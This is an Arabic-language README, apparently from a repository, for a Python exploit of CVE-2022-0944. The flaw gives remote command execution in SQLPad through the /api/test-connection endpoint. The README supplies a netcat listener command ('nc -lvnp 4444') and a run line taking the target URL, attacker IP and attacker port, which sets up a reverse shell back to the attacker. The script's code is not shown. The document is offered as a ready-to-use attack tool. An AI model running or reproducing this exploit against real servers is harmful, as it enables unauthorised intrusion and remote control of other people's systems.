
استغلال بلغة Python لـ CVE-2022-0944 يتيح تنفيذ الأوامر عن بُعد بشكل أعمى في SQLPad من خلال نقطة نهاية /api/test-connection مع استدعاء netcat.
يحتوي هذا المستودع على سكريبت استغلال لـ CVE-2022-0944 في SQLPad، وهي ثغرة أمنية تسمح بتنفيذ الأوامر عن بُعد (RCE) عبر نقطة النهاية /api/test-connection.
يوضح السكريبت المقدم (exploit.py) كيفية استغلال ثغرة RCE في SQLPad. يُرسل السكريبت حمولة إلى نقطة النهاية المصابة، منفذاً أمراً على الخادم المستهدف.
requests (يمكن تثبيتها عبر pip)nc -lvnp 4444
تشغيل الاستغلال
python exploit.py <sqlpad_url> <attacker_ip> <attacker_port>